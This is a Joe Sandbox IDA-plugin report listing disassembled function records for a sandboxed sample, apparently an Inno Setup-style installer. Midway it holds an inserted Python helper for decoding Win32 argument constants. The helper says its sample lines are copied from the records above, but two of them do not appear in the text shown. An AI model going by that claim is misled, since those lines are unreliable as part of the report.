                                                                                      • Opcode ID: d547f96382ddb47af51d9cc29b1b85abbfcd8a0dd46a61b3a596026ad2d6d4ad
                                                                                      • Instruction ID: 553864e69fa8df29f0895cd1651d22ce7dcdc08a544756bbeb7b66468d6216b8
                                                                                      • Opcode Fuzzy Hash: d547f96382ddb47af51d9cc29b1b85abbfcd8a0dd46a61b3a596026ad2d6d4ad
                                                                                      • Instruction Fuzzy Hash: DF912371A04208BBDB11DF95C942BDEB7F9EB08346F10446BF900F7282D6789F098B69
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(?), ref: 0045723F
                                                                                      • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 0045725B
                                                                                      • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00457269
                                                                                      • GetExitCodeProcess.KERNEL32(?), ref: 0045727A
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 004572C1
                                                                                      • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 004572DD
                                                                                      Strings
                                                                                      • Helper process exited with failure code: 0x%x, xrefs: 004572A7
                                                                                      • Helper process exited, but failed to get exit code., xrefs: 004572B3
                                                                                      • Stopping 64-bit helper process. (PID: %u), xrefs: 00457231
                                                                                      • Helper isn't responding; killing it., xrefs: 0045724B
                                                                                      • Helper process exited., xrefs: 00457289
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                      • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                      • API String ID: 3355656108-1243109208
                                                                                      • Opcode ID: 6b2201595befcdbf0454e25f3f98579558f6d853a158eaa6821fe7e437e0bd5b
                                                                                      • Instruction ID: cbbbea6dedd0d273467075bf502e8a2b7be663cd85a1a49bef8c8f37b48c8077
                                                                                      • Opcode Fuzzy Hash: 6b2201595befcdbf0454e25f3f98579558f6d853a158eaa6821fe7e437e0bd5b
                                                                                      • Instruction Fuzzy Hash: 89215C70608B009AC720E779D441B5BB7D4AF08305F04897FBC9ACB283D678E8489B6A
                                                                                      APIs
                                                                                        • Part of subcall function 0042DC1C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DC48
                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004531C3,?,00000000,00453287), ref: 00453113
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004531C3,?,00000000,00453287), ref: 0045324F
                                                                                        • Part of subcall function 0042E670: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451E7B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E68F
                                                                                      Strings
                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045305B
                                                                                      • , xrefs: 00453075
                                                                                      • RegCreateKeyEx, xrefs: 00453087
                                                                                      • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 0045302B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFormatMessageQueryValue
                                                                                      • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                      • API String ID: 2481121983-1280779767
                                                                                      • Opcode ID: 758553f8d2e594071fe37aa958d85f9a645975654b76cf36553100ddb6c8e864
                                                                                      • Instruction ID: 2c0c5fe921886f73e21521b3bff8a538c4309916fb6f6cfb0a6381ca684f6e5a
                                                                                      • Opcode Fuzzy Hash: 758553f8d2e594071fe37aa958d85f9a645975654b76cf36553100ddb6c8e864
                                                                                      • Instruction Fuzzy Hash: C5812171A00609AFDB00DFE5C941BDEB7B9EB08345F54446AF901F7282D778AA09CB69
                                                                                      APIs
                                                                                        • Part of subcall function 004524C4: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004915B5,_iu,?,00000000,004525FE), ref: 004525B3
                                                                                        • Part of subcall function 004524C4: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004915B5,_iu,?,00000000,004525FE), ref: 004525C3
                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00491461
                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004915B5), ref: 00491482
                                                                                      • CreateWindowExA.USER32(00000000,STATIC,004915C4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004914A9
                                                                                      • SetWindowLongA.USER32(?,000000FC,00490C3C), ref: 004914BC
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00491588,?,?,000000FC,00490C3C,00000000,STATIC,004915C4), ref: 004914EC
                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00491560
                                                                                      • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00491588,?,?,000000FC,00490C3C,00000000), ref: 0049156C
                                                                                        • Part of subcall function 00452814: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004528FB
                                                                                      • 73A15CF0.USER32(?,0049158F,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00491588,?,?,000000FC,00490C3C,00000000,STATIC), ref: 00491582
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                      • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                      • API String ID: 170458502-2312673372
                                                                                      • Opcode ID: 5955ee03ed027167db5067d7769f0f2e7a3333a957f84736b9c043bd00e9a10a
                                                                                      • Instruction ID: 8fdd4e63cd422c3942ebc1833423ec4bc75e2ea9b26886e4930e7115e52d1235
                                                                                      • Opcode Fuzzy Hash: 5955ee03ed027167db5067d7769f0f2e7a3333a957f84736b9c043bd00e9a10a
                                                                                      • Instruction Fuzzy Hash: 10415270A04209AEDF00EBA5CD42F9E7BF8EB49714F51457AF500F72D2D6799E008BA8
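The "APIs" bullets in these records print every argument as a raw 32-bit value, so constants such as 00002710, 00001001, C0000000 or 00000097 have to be decoded by hand before the call sequence (10-second wait before TerminateProcess, 250 ms polling Sleep, SHCNE_UPDATEDIR with SHCNF_FLUSH after shortcut creation, a hidden STATIC window) can be read. The following Python helper is an added example for working with this report and is not Joe Sandbox or IDA-plugin code: it parses the bullet format, looks up the argument position for a handful of APIs that appear above, and annotates the value with its Win32 name. The constant values come from the Windows SDK headers; the sample lines are copied from the records above, and the bracketed output format is our own choice.

```python
"""Decode raw Win32 argument values in the "APIs" bullets of a Joe Sandbox function record.

Added example for reading this report; it is not Joe Sandbox or IDA-plugin code.
Constant values come from the Windows SDK headers; the bracketed output format is ours.
"""
import re
from typing import Callable, Dict, List, Tuple

# One bullet: API.MODULE(arg,arg,...), ref: ADDRESS (a "Part of subcall ..." prefix may precede it)
CALL_RE = re.compile(
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9]+)\((?P<args>[^()]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
HEX8_RE = re.compile(r"[0-9A-Fa-f]{8}")


def flags(table: Dict[int, str]) -> Callable[[int], str]:
    """Decoder for bitmask arguments; unknown bits are kept as hex so nothing is silently dropped."""
    def decode(value: int) -> str:
        names = [name for bit, name in table.items() if value & bit]
        rest = value & ~sum(table)
        if rest:
            names.append(hex(rest))
        return "|".join(names) or "0"
    return decode


def enum(table: Dict[int, str]) -> Callable[[int], str]:
    """Decoder for single-valued arguments; unknown values fall back to hex."""
    return lambda value: table.get(value, hex(value))


def millis(value: int) -> str:
    return "INFINITE" if value == 0xFFFFFFFF else f"{value} ms"


# (API name, zero-based parameter index) -> decoder. Only real parameter positions are listed:
# the report also prints stack slots beyond the last parameter, and those are stale values.
DECODERS: Dict[Tuple[str, int], Callable[[int], str]] = {
    ("WaitForSingleObject", 1): millis,
    ("Sleep", 0): millis,
    ("SHChangeNotify", 0): enum({0x2: "SHCNE_CREATE", 0x8: "SHCNE_MKDIR", 0x1000: "SHCNE_UPDATEDIR"}),
    ("SHChangeNotify", 1): flags({0x1: "SHCNF_PATHA", 0x1000: "SHCNF_FLUSH"}),
    ("RegOpenKeyExA", 0): enum({0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}),
    ("CreateFileA", 1): flags({0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}),
    ("CreateFileA", 4): enum({1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}),
    ("CreateFileA", 5): flags({0x80: "FILE_ATTRIBUTE_NORMAL"}),
    ("SetWindowPos", 6): flags({0x1: "SWP_NOSIZE", 0x2: "SWP_NOMOVE", 0x4: "SWP_NOZORDER", 0x8: "SWP_NOREDRAW",
                                0x10: "SWP_NOACTIVATE", 0x40: "SWP_SHOWWINDOW", 0x80: "SWP_HIDEWINDOW"}),
    ("StretchBlt", 10): enum({0x00CC0020: "SRCCOPY"}),
    ("FormatMessageA", 0): flags({0x200: "FORMAT_MESSAGE_IGNORE_INSERTS", 0x1000: "FORMAT_MESSAGE_FROM_SYSTEM",
                                  0x2000: "FORMAT_MESSAGE_ARGUMENT_ARRAY"}),
}


def annotate(line: str) -> str:
    """Return the bullet with decodable arguments rewritten as 'VALUE [NAME]'; other lines pass through."""
    m = CALL_RE.search(line)
    if not m:
        return line
    api = m.group("api")
    args: List[str] = []
    for index, raw in enumerate(m.group("args").split(",")):
        decoder = DECODERS.get((api, index))
        if decoder and HEX8_RE.fullmatch(raw):
            raw = f"{raw} [{decoder(int(raw, 16))}]"
        args.append(raw)
    rebuilt = f"{api}.{m.group('module')}({','.join(args)}), ref: {m.group('ref')}"
    return line[: m.start()] + rebuilt + line[m.end():]


def annotate_text(text: str) -> str:
    """Annotate every line of a pasted record; non-API lines (hashes, dump sources) are unchanged."""
    return "\n".join(annotate(line) for line in text.splitlines())


# Sample bullets copied from the records above (the registry path is a raw string on purpose).
SAMPLE = r"""• WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00457269
• Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 004572DD
• SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 0046EB81
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00491588), ref: 004914EC
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,OG,?,00000001), ref: 0042DC70"""

if __name__ == "__main__":
    print(annotate_text(SAMPLE))
```

Two caveats when extending the tables. First, positions past an API's real parameter count are leftover stack contents (the 00002710 values in the Sleep and TerminateProcess bullets are the WaitForSingleObject timeout from the same frame), so only index real parameters. Second, some small values look like zero-extended 8-bit immediates: SetWindowLongA above shows 000000FC where GWL_WNDPROC is -4, and MsgWaitForMultipleObjects shows 000000FF where INFINITE would be -1. That is our reading of the listing, not something the report states, so verify such values in the disassembly before decoding them.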
                                                                                      APIs
                                                                                      • GetActiveWindow.USER32 ref: 0042EBEC
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042EC00
                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042EC0D
                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042EC1A
                                                                                      • GetWindowRect.USER32(?,00000000), ref: 0042EC66
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042ECA4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                      • API String ID: 2610873146-3407710046
                                                                                      • Opcode ID: ab635a9dbd45ec810e9935963670e5bdc3844d9f2a3901bc6b7a360ecf31759e
                                                                                      • Instruction ID: 4a37ecb70f16d0e534201d00fe1897e1a246a2af0c0267f068437e20043e9251
                                                                                      • Opcode Fuzzy Hash: ab635a9dbd45ec810e9935963670e5bdc3844d9f2a3901bc6b7a360ecf31759e
                                                                                      • Instruction Fuzzy Hash: 1221CF72301624AFD300DAAADC81F3B3698EB84B10F09452EF944EB382DA78DC048A59
                                                                                      APIs
                                                                                      • GetActiveWindow.USER32 ref: 0045F2B4
                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 0045F2C8
                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0045F2D5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0045F2E2
                                                                                      • GetWindowRect.USER32(?,00000000), ref: 0045F32E
                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0045F36C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                                      • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                                      • API String ID: 2610873146-3407710046
                                                                                      • Opcode ID: 0759357e475281c3d178149a1403ff3b79648049ae6c1278b3f2bdc8cf34fbc7
                                                                                      • Instruction ID: 95483c6525a53468b4ec8186bc606c8502f0d91924da71a6d47f5662d43c45fd
                                                                                      • Opcode Fuzzy Hash: 0759357e475281c3d178149a1403ff3b79648049ae6c1278b3f2bdc8cf34fbc7
                                                                                      • Instruction Fuzzy Hash: 112192757456046BE3109A68CC81F3F3799DB88715F09453EFD84DB382DA78ED0C8A9A
APIs
• RtlEnterCriticalSection.KERNEL32(00496420,00000000,00401B68), ref: 00401ABD
• LocalFree.KERNEL32(00642730,00000000,00401B68), ref: 00401ACF
• VirtualFree.KERNEL32(?,00000000,00008000,00642730,00000000,00401B68), ref: 00401AEE
• LocalFree.KERNEL32(00643730,?,00000000,00008000,00642730,00000000,00401B68), ref: 00401B2D
• RtlLeaveCriticalSection.KERNEL32(00496420,00401B6F), ref: 00401B58
• RtlDeleteCriticalSection.KERNEL32(00496420,00401B6F), ref: 00401B62
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID: 0'd$07d$T=d$d=d
• API String ID: 3782394904-4213436424
• Opcode ID: d7983087b8bcbabcafc2c9d8a305f4a93e6fa46b606c4ef3e584c6169f95cf8d
• Instruction ID: bf2c7a4256457c5f50c71aa29f18f829c6f6e2c919ab822836d088e606c14c70
• Opcode Fuzzy Hash: d7983087b8bcbabcafc2c9d8a305f4a93e6fa46b606c4ef3e584c6169f95cf8d
• Instruction Fuzzy Hash: 5D118F30A403405EEB15ABE99D82F263BE59761B4CF56407BF80067AF1D77C9850C76E
APIs
• SysFreeString.OLEAUT32(?), ref: 00454E69
• 76CCE550.OLE32(00494A58,00000000,00000001,00494774,?,00000000,00454F64), ref: 00454CDA
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• 76CCE550.OLE32(00494764,00000000,00000001,00494774,?,00000000,00454F64), ref: 00454D00
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: E550String$AllocByteCharFreeMultiWide
• String ID: CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue$IShellLink::QueryInterface
• API String ID: 2757340368-2052886881
• Opcode ID: 5948eefd91c64643e410a8502d34ef97e64b0715af901c2b07599baa63df0646
• Instruction ID: 0b21da03975bca805d8248ee8d2b37e628922fffcf98328ca7261b0fae796446
• Opcode Fuzzy Hash: 5948eefd91c64643e410a8502d34ef97e64b0715af901c2b07599baa63df0646
• Instruction Fuzzy Hash: AA915071A00104AFDB50DFA9C885F9E77F8AF89709F50406AF904EB262DB78DD48CB59
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004575BF,?,00000000,00457622,?,?,02313858,00000000), ref: 0045743D
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02313858,?,00000000,00457554,?,00000000,00000001,00000000,00000000,00000000,004575BF), ref: 0045749A
• GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02313858,?,00000000,00457554,?,00000000,00000001,00000000,00000000,00000000,004575BF), ref: 004574A7
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004574F3
• GetOverlappedResult.KERNEL32(?,?,00000000,00000001,0045752D,?,-00000020,0000000C,-00004034,00000014,02313858,?,00000000,00457554,?,00000000), ref: 00457519
• GetLastError.KERNEL32(?,?,00000000,00000001,0045752D,?,-00000020,0000000C,-00004034,00000014,02313858,?,00000000,00457554,?,00000000), ref: 00457520
  • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
• String ID: CreateEvent$TransactNamedPipe
• API String ID: 2182916169-3012584893
• Opcode ID: c1a3a8f9ea1166c106d188104454f7bffd3a84fcc42e4e20bcaa0ea938d488a9
• Instruction ID: 79c6e3806f75cd6c2156c397a36c552c7ebc7e0cdca09418cd540dcb18b715b5
• Opcode Fuzzy Hash: c1a3a8f9ea1166c106d188104454f7bffd3a84fcc42e4e20bcaa0ea938d488a9
• Instruction Fuzzy Hash: 98418E70A04608BFDB15DF99D981F9EBBF8EB09710F5040B6F904E7792D6789E44CA28
APIs
• GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0045529D,?,?,00000031,?), ref: 00455160
• GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00455166
• LoadTypeLib.OLEAUT32(00000000,?), ref: 004551B3
  • Part of subcall function 004520A4: GetLastError.KERNEL32(00000000,00452B15,00000005,00000000,00452B4A,?,?,00000000,00496628,00000004,00000000,00000000,00000000,?,00492A61,00000000), ref: 004520A7
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: AddressErrorHandleLastLoadModuleProcType
• String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
• API String ID: 1914119943-2711329623
• Opcode ID: 1ed3e8c5a2aa991d601313e4c083ed3eccbaf9bc08da749f5376dbd3bf59aa27
• Instruction ID: fb038adfd684185714a4e58cf340431a6a295a782a22b6c655451b98c415bd11
• Opcode Fuzzy Hash: 1ed3e8c5a2aa991d601313e4c083ed3eccbaf9bc08da749f5376dbd3bf59aa27
• Instruction Fuzzy Hash: DD31A571A00A04AFC711EFAACC61D6F77B9EB89B41B5044A6FD04D7352DA38D904CB29
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001,00000000,00000002,00000000,0047BE41), ref: 0042E29D
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E2A3
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E379,?,?,00000001,00000000,?,?,00000001), ref: 0042E2F1
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-2401316094
• Opcode ID: 45ed28070ffb47697e526778f64ff79688c24bec5b2b36becef891b4b1b2b151
• Instruction ID: d6249f7fc2f92a5c557ffc1224eecf0a88ec9f0d2c320431a8896816ae334499
• Opcode Fuzzy Hash: 45ed28070ffb47697e526778f64ff79688c24bec5b2b36becef891b4b1b2b151
• Instruction Fuzzy Hash: 80212670B00215EBDB00EAA7DC55B9F77A9EB44315FD04477A900E7281DB7C9E05DB58
APIs
• RtlInitializeCriticalSection.KERNEL32(00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
• RtlEnterCriticalSection.KERNEL32(00496420,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
• LocalAlloc.KERNEL32(00000000,00000FF8,00496420,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
• RtlLeaveCriticalSection.KERNEL32(00496420,00401A89,00000000,00401A82,?,?,0040222E,00496460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Strings
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
Similarity
• API ID: CriticalSection$AllocEnterInitializeLeaveLocal
• String ID: 0'd$T=d$`dI$`dI$d=d
• API String ID: 730355536-3618501334
• Opcode ID: f176e8b5bc4d8de55a84342bec8c86950c68c795945543f3ab918003abf5a290
• Instruction ID: 5e78e1d922e44001d172df758a9733a16a6df98b74bc9f0da5c534ca1700ba01
• Opcode Fuzzy Hash: f176e8b5bc4d8de55a84342bec8c86950c68c795945543f3ab918003abf5a290
• Instruction Fuzzy Hash: EC01C0706442405EFB19ABE99802B253ED4D795B88F13803FF440A6AF1C67C4840CB2D
APIs
• RectVisible.GDI32(?,?), ref: 00416D83
• SaveDC.GDI32(?), ref: 00416D97
• IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416DBA
• RestoreDC.GDI32(?,?), ref: 00416DD5
• CreateSolidBrush.GDI32(00000000), ref: 00416E55
• FrameRect.USER32(?,?,?), ref: 00416E88
• DeleteObject.GDI32(?), ref: 00416E92
• CreateSolidBrush.GDI32(00000000), ref: 00416EA2
• FrameRect.USER32(?,?,?), ref: 00416ED5
• DeleteObject.GDI32(?), ref: 00416EDF
Memory Dump Source
• Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
